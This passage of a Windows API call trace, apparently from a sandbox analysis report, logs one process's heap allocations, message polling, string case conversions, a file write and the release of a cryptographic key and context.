0x2a71868 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.834] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0176.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.836] WriteFile (in: hFile=0x47c, lpBuffer=0x2a71908*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71908*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0176.865] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0176.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0176.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0176.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0176.889] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0176.889] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0176.889] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0176.889] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.889] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0176.890] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.890] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0176.890] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.890] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0176.890] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0176.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0176.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa8b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0176.891] CryptDestroyKey (hKey=0x9e2238) returned 1 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0176.891] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0176.891] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0176.891] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0176.891] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0176.891] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0176.891] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.891] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0176.891] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0176.891] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0176.892] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0176.892] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0176.892] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0176.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0176.892] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0176.892] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0176.912] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.912] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0176.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0176.912] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.912] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0176.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.912] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0176.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.913] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0176.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.913] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0176.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.913] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0176.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.913] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0176.913] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.913] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0176.913] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.913] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.913] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.913] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.913] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.913] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.913] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.914] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6e80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0176.914] CryptReleaseContext (hProv=0xa7c2a8, dwFlags=0x0) returned 1 [0176.914] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.914] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.914] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.914] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0176.918] FreeLibrary (hLibModule=0x76390000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0176.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0176.918] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0176.918] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0176.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0176.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0176.919] CloseHandle (hObject=0x47c) returned 1 [0176.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0176.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0176.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0176.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0176.996] PeekMessageW (in: 